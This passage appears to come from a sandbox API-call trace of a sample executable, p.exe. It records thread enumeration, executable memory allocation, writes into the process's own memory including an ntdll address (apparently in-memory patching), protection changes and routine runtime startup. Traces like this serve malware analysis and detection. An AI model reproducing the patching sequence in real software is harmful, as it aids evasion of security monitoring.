lpte=0x18f83c) returned 1 [0049.962] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.962] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.962] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.963] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.963] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.963] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.963] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.964] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.964] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.964] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.964] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.965] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.965] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.965] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.965] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.966] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.966] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.966] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.967] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.967] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.967] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.968] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.968] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.968] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.968] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.969] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.969] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.969] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.969] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.970] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.970] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.970] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.970] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.971] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.971] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.971] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.972] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.972] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.972] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.972] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.973] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.973] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.973] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.973] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.974] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.974] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.974] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.974] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.975] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.975] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.975] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.975] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.976] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.976] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.976] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.977] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.977] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.977] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.977] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.978] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.978] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.978] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.978] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.979] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.979] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.979] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.979] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.980] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.980] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.980] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.981] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.981] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.981] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.981] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.982] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.982] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.982] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.983] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.983] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.983] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.983] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.984] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.984] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.984] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.984] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.985] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.985] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.985] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.986] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.986] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.986] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0050.031] CloseHandle (hObject=0xbc) returned 1 [0050.032] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0050.033] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x25d260 [0050.033] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x17) returned 0x250e80 [0050.034] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x25d278 [0050.035] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2b0000 [0050.035] GetCurrentProcess () returned 0xffffffff [0050.035] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x2b0005, lpBuffer=0x18f324*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f324*, lpNumberOfBytesWritten=0x0) returned 1 [0050.036] GetCurrentProcess () returned 0xffffffff [0050.036] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x2b000f, lpBuffer=0x18f328*, nSize=0x6, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f328*, lpNumberOfBytesWritten=0x0) returned 1 [0050.037] GetCurrentProcess () returned 0xffffffff [0050.037] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x77c60028, lpBuffer=0x18f324*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f324*, lpNumberOfBytesWritten=0x0) returned 1 [0050.038] GetCurrentProcess () returned 0xffffffff [0050.039] VirtualProtect (in: lpAddress=0x2b0000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x18f364 | out: lpflOldProtect=0x18f364*=0x40) returned 1 [0050.039] GetCurrentProcess () returned 0xffffffff [0050.041] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fac8*=0x42f000, NumberOfBytesToProtect=0x18fac0, NewAccessProtection=0x20, OldAccessProtection=0x18fe08 | out: BaseAddress=0x18fac8*=0x42f000, NumberOfBytesToProtect=0x18fac0, OldAccessProtection=0x18fe08*=0x40) returned 0x0 [0050.047] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fac8*=0x41e000, NumberOfBytesToProtect=0x18fac0, NewAccessProtection=0x2, OldAccessProtection=0x18fe08 | out: BaseAddress=0x18fac8*=0x41e000, NumberOfBytesToProtect=0x18fac0, OldAccessProtection=0x18fe08*=0x4) returned 0x0 [0050.048] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fac8*=0x401000, NumberOfBytesToProtect=0x18fac0, NewAccessProtection=0x20, OldAccessProtection=0x18fe08 | out: BaseAddress=0x18fac8*=0x401000, NumberOfBytesToProtect=0x18fac0, OldAccessProtection=0x18fe08*=0x40) returned 0x0 [0050.049] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fac8*=0x454000, NumberOfBytesToProtect=0x18fac0, NewAccessProtection=0x4, OldAccessProtection=0x18fe08 | out: BaseAddress=0x18fac8*=0x454000, NumberOfBytesToProtect=0x18fac0, OldAccessProtection=0x18fe08*=0x20) returned 0x0 [0050.050] GetVersionExA (in: lpVersionInformation=0x18fe78*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="^") | out: lpVersionInformation=0x18fe78*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0050.050] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0050.050] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x29f0000 [0050.051] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0050.051] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0050.052] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0050.052] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0050.052] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0050.052] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0050.052] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0050.052] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x8, Size=0x8c) returned 0x29f07d0 [0050.052] GetCurrentThreadId () returned 0xae0 [0050.052] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x480) returned 0x29f0868 [0050.052] GetStartupInfoA (in: lpStartupInfo=0x18fe30 | out: lpStartupInfo=0x18fe30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0050.052] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0050.053] GetFileType (hFile=0x0) returned 0x0 [0050.053] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0050.053] GetFileType (hFile=0x0) returned 0x0 [0050.053] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0050.053] GetFileType (hFile=0x0) returned 0x0 [0050.053] SetHandleCount (uNumber=0x20) returned 0x20 [0050.053] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe\" " [0050.053] GetEnvironmentStringsW () returned 0xeb89d0* [0050.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0050.053] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x565) returned 0x29f0cf0 [0050.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x29f0cf0, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0050.053] FreeEnvironmentStringsW (penv=0xeb89d0) returned 1 [0050.053] GetACP () returned 0x4e4 [0050.053] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x220) returned 0x29f1260 [0050.053] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fdf8 | out: lpCPInfo=0x18fdf8) returned 1 [0050.053] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fdc8 | out: lpCPInfo=0x18fdc8) returned 1 [0050.053] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f884 | out: lpCharType=0x18f884) returned 1 [0050.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fcc8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0050.055] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fcc8, cbMultiByte=256, lpWideCharStr=0x18f668, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ") returned 256 [0050.055] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ", cchSrc=256, lpCharType=0x18f8c8 | out: lpCharType=0x18f8c8) returned 1 [0050.055] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0050.055] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fcc8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0050.055] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fcc8, cbMultiByte=256, lpWideCharStr=0x18f62c, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ") returned 256 [0050.055] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0050.055] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ", cchSrc=256, lpDestStr=0x18f42c, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ") returned 256 [0050.055] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ", cchWideChar=256, lpMultiByteStr=0x18fbc8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01", lpUsedDefaultChar=0x0) returned 256 [0050.055] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fcc8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0050.055] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fcc8, cbMultiByte=256, lpWideCharStr=0x18f60c, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ") returned 256 [0050.055] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0050.055] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ", cchSrc=256, lpDestStr=0x18f40c, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 